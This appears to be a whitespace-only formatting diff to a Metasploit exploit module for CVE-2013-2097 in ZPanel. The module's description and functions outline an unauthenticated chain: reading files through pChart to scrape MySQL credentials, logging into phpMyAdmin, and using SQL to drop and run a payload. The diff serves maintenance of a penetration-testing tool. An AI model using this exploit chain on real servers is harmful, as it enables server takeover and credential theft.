Formatting ZPanel Exploit

modules/exploits/multi/http/zpanel_information_disclosure_rce.rb

@@ -2,35 +2,35 @@ require 'msf/core'
 require 'msf/core/exploit/php_exe'
 	
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = GreatRanking
+  Rank = GreatRanking
 
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::FileDropper
-	include Msf::Exploit::PhpEXE
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::PhpEXE
 
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Zpanel Remote Unauthenticated RCE',
-			'Description'    => %q{
-				This module exploits an information disclosure vulnerability
-				found in Zpanel <= 10.1.0. The vulnerability exposed due to a
-				vulnerable version of pChart allowing remote, unauthenticated,
-				users to read arbitrary files found on the filesystem. This
-				particular module utilizes this vulnerability to identify the
-				username/password combination of the MySQL instance. With the
-				credentials the attackers can login to PHPMyAdmin and execute
-				SQL commands to drop a malicious payload on the filesystem and
-				call it leading to remote code execution.
-			},
-			'Author'         => [ 
-												'dawn isabel',	#dawn.isabel[at]gmail.com
-												'brad wolfe',		#brad.wolfe[at]gmail.com
-												'brent morris',	#inkrypto[at]gmail.com
-												'james fitts'		#fitts.james[at]gmail.com
-				 ],
+  def initialize(info = {})
+	  super(update_info(info,
+		  'Name'           => 'Zpanel Remote Unauthenticated RCE',
+		  'Description'    => %q{
+			  This module exploits an information disclosure vulnerability
+			  found in Zpanel <= 10.1.0. The vulnerability exposed due to a
+			  vulnerable version of pChart allowing remote, unauthenticated,
+			  users to read arbitrary files found on the filesystem. This
+			  particular module utilizes this vulnerability to identify the
+		    username/password combination of the MySQL instance. With the
+			  credentials the attackers can login to PHPMyAdmin and execute
+			  SQL commands to drop a malicious payload on the filesystem and
+			  call it leading to remote code execution.
+       },
+		  'Author'         => [ 
+			  'dawn isabel',	#dawn.isabel[at]gmail.com
+			  'brad wolfe',		#brad.wolfe[at]gmail.com
+			  'brent morris',	#inkrypto[at]gmail.com
+			  'james fitts'		#fitts.james[at]gmail.com
+			  ],
 			'License'        => MSF_LICENSE,
 			'References'     =>
-				[
+			  [
 					[ 'CVE', '2013-2097' ],
 					[ 'EDB', '31173' ],		# pChart
 					[ 'OSVDB', '102595' ],	# pChart
@@ -76,7 +76,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		dbname = res.body.scan(/(?<=\$dbname&nbsp;<\/span><span style\="color: #007700"\>=&nbsp;<\/span><span style\="color: #DD0000"\>')[A-Za-z0-9_]+/)
 
 		return uname, passwd, dbname
-
 	end
 
 	def grab_sess_and_token(uri)
@@ -121,7 +120,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		else
 			print_error("PHPSESSID could not be identified...")
 		end
-
 	end
 
 	def login_phpmyadmin(uri, uname, passwd, cookies, token, sess_id)
@@ -175,7 +173,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_good("PHPMyAdmin login successful!")
 			return new_cookies, token
 		end
-
 	end
 
 	def do_sql(cookies, token, uri)
@@ -265,6 +262,5 @@ class Metasploit3 < Msf::Exploit::Remote
 		else
 			print_error("It appears that the version of pChart is not vulnerable...")
 		end
-
 	end
 end